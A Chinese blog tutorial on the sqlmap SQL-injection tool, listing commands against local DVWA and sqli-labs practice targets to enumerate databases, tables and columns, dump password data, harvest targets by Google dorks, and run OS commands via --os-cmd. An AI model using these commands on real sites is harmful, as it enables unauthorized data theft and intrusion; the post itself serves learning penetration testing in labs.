第十二天 学习工具sqlmap

最新推荐文章于 2024-02-26 16:11:58 发布
最新推荐文章于 2024-02-26 16:11:58 发布
阅读量185 收藏 1
点赞数
分类专栏: Web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46653764/article/details/106818822
版权

检测单一URL

-u 或 --url
sqlmap.py -u “http://192.x.x.x/sqli-labs-master/Less-1?id=1” --batch (- -batch是自动确认选项)

sqlmap.py -u “http://192.x.x.x/sqli-labs-master/Less-1?id=1” --batch --banner (- -banner是得到mysql版本信息)


从不同的文件类型读取目标进行sql注入探测

(1)-l 从burp中的project options–>Misc–> proxy 中读取Http requests日志文件

(2)-m多行文本文件读取多个目标,一行为一个URL地址进行批量检测。
sqlmap.py -m xxx.txt

(3)-r 从文本文件中读取Http请求作为探测目标,可以利用burp抓包,把http请求保存在一个txt文件中,然后用sqlmap扫描

(4)-c 从配置文件 sqlmap.conf 中读取目标探测,把要探测的目标写入sqlmap.conf文件中即可
sqlmap.py -c sqlmap.conf


Google hack

sqlmap.py -g “inurl:.”.php?id=1"" 可以通过谷歌语法,让sqlmap自动获取目标来探测

get注入获取数据

(1)sqlmap.py -u “http://192.168.108.161/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7c290dd15142fb76532f6583decfcb4c” –dbs --batch (- -dbs 获取所有数据库,这里用- -cookie是因为不加cookie会返回302,检测不到注入点,所以利用cookie来检测是否有sql注入

(2)sqlmap.py -u “http://192.168.108.161/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7c290dd15142fb76532f6583decfcb4c” -D security --tables --batch (获取表名)

(3)sqlmap.py -u “http://192.168.108.161/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7c290dd15142fb76532f6583decfcb4c” -D security -T users --columns --batch (获取列名)

(4)sqlmap.py -u “http://192.168.108.161/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” - - cookie"security=low;
PHPSESSID=7c290dd15142fb76532f6583decfcb4c" -D security -T users -C password --dump --batch (获取数据)

level检测级别

sqlmap.py -u “http://192.168.108.161/DVWA-master/vulnerabilities/sqli/?id=2&Submit=Submit#” –level 3- -level,最高等级是5,默认是1


POST注入

想要把请求类型变成POST,可以这样做↓
sqlmap.py -u “http://192.168.108.161/DVWA-master/vulnerabilities/sqli/?Submit=Submit#” - -data=“id=1” --batch



cookie注入

- -cookie “xxx”

请求头注入

星号*优先指定检测注入

而在- -headers “xxxx” 可以通过–headers参数来增加额外的http头,但记得- -level要指定为3, 1和2是不去检测请求头部分的注入漏洞的。

对注入的选择

- -technique “U” --> 用联合注入的方法去探测漏洞)
在这里插入图片描述

其他

(1) - -param-del=某字符,当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数

(2)- -referer=REFERER sqlmap可以在请求中伪造HTTP中的referer,当- -level参数设定为3或者3以上的时候会尝试对referer注入

(3)- -proxy 使用代理服务器连接到目标URL

(4) - -ignore-401 忽略HTTP 401错误

(5)在这里插入图片描述

(6)- -dns-domain=DNS… DNS泄露攻击使用的域名

(7)-f 执行广泛的DBMS版本指纹检查

(8)在这里插入图片描述
在这里插入图片描述
(9)- -os-cmd=OSCMD 执行操作系统命令(OSCMD)

(10)

Sanfer23
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap 常用命令
tryheart的博客
09-01 1247
常用命令 -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 –dbs 列出所有的数据库 –current-db 列出当前数据库 –tables 列出当前的表 –columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 –dump 获取字段中的数据 –batch 自动选择yes –smart 启发式快速判断,节约浪费时间 –forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请求包txt文件) -l 加载文件
Sqlmap工具】使用与应用技巧
2301_77162959的博客
03-22 748
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
SQLmap常用命令/使用教程
wangyuxiang946的博客
08-08 1万+
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --data= -- 指定POST请求参数 --cookie -- 指定cookie参数 -r -- 从文件中加载HTTP请求(在需要检测的Header后面加上*) 获取数据 --dbs -- 获取数据库名 --tables -- 获取表名 --columns -- 获取字段名 --du
有了这个网络安全面试题,面试就像开了挂!(附PDF)
最新发布
lvaolan的博客
02-26 843
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Python之SQLMap自动SQL注入和渗透测试工具示例详解
naer_chongya的博客
07-20 1978
在网络安全领域中,渗透测试是一项重要的任务。其中,SQL注入攻击是最常见的一种攻击方式之一。为了简化渗透测试过程中的繁琐操作,开发者们设计了各种自动工具。其中,SQLMap是一款使用Python编写的强大工具,用于进行自动化的SQL注入和渗透测试。本文将详细介绍SQLMap的使用方法,包括Python语言环境的搭建、SQLMap的安装和配置、基本使用方法以及具体示例,以帮助读者更好地理解和运用这一强大的工具
红队专题-渗透工具-sqlmap
aming小老弟
01-29 2万+
目标对象 请求 优化 —线程。
第十四节 Sqlmap注入技术参数2-01
09-15
Sqlmap是一款功能强大的SQL注入工具,能够自动检测和利用SQL注入漏洞。了解Sqlmap的参数设置是mastering Sqlmap的关键。下面是Sqlmap注入技术参数2-01的知识点总结: 一、十六进制介绍 十六进制是一种基数为16的...
第十八节 Sqlmap枚举信息2-01
09-15
这将获取第二张到第三张表的名字。 四、Sqlmap设置条件获取信息 Sqlmap也提供了条件获取信息的功能。例如,用户可以使用--pivot-column开关来设置独一无二的列,并使用--where开关来设置条件。例如: ``` python ...
SQLmap学习笔记
weixin_43988774的博客
03-23 4297
sqlmap所有参数的学习笔记
sqlmap基础学习(笔记)
部分学习记录
07-30 1245
此文为自己学习sqlmap基础的笔记,留个痕迹,便于以后复习查询 #sqlmap获取目标 python sqlmap --version python sqlmap -h python sqlmap -hh #sqlmap直连数据库 ##服务型数据库(MySQL、Oracle、Microsoft SQL Server、PostqreSQL etc) DBMS://USER:PASSWORD@DBMS_IP/PORT/DATABASE_NAME 例如:python sqlmap.py -d “mysql://
注入神器-----SqlMap的使用
weixin_54227009的博客
05-28 1380
sqlmap GET参数: -u 网址 --dbs:获取注入点的所有数据库 -D:指定数据库 --tables:获取指定的表 -T:表名 --columns:获取表的指定字段 -C:获取指定字段 --dump:把数据打印出来 POST注入: 先抓包, 注入点的位置打个*号 然后保存为txt文档 -r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点 --current-db:获取当前数据库 sqlmap获取sh...
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
Sqlmap(SQL注入自动工具)
F2444790591的博客
07-16 3791
自动化SQL注入工具Sqlmap
SQLmap 扫描工具的使用
m0_61990875的博客
10-21 2926
sqlmap的使用方法
SQLMAP自动注入(一)
weixin_30337251的博客
07-15 260
一,五种常见的注入方式 基于Bool类型的注入方式 基于时间的盲注 ' and (select * from (select(sleep(20)))a)--+ 基于错误的检测 服务器把错误信息反馈回来(少见) 基于UNION联合查询 联合查询的前提是通过for(while)循环直接输出联合查询结果,...
sqlmap工具基本使用(检测sql注入)
m0_37570494的博客
01-25 6238
sqlmap的用户手册: sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1、先检测是否可以注入,先判断是否可以正常注入: sqlmap -u url -v 3 里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题 对于某些今天url可以在/a/b*.html尝试加入*号来进行此路径内的检测 2、爆库 sqlmap.py -u http://...
sqlmap确定目标
qq_62414152的博客
12-14 732
sqlmap确定目标: 1. sqlmap直连数据库: 已经获得了数据库的一些旗标信息:如用户名和密码,ip地址,端口等。 直连数据库获得旗标: python sqlmap .py sqlmap -d "数据库类型://用户名:密码@ip地址:端口/数据库名" -f --banner python sqlmap .py sqlmap -d "mysql://root:6543221@192.168.80.999:8080/demo1" -f --banner 直连数据库获得用户及权限: python sql
【渗透工具】P 3-2 sqlmap确定目标
Z_David_Z的博客
02-16 276
目录0X01 sqlmap直连数据库0X02 URL探测0X03 sqlmap文件读取目标0X04 sqlmap Google批量扫注入 0X01 sqlmap直连数据库 Sqlmap支持直连数据库,通过以下命令来直连。 服务型数据库(前提知道数据库用户名和密码): DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME (MySQL, Oracle, Microsoft SQL Server, PostgreSQL, etc.) 例如:python sql
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值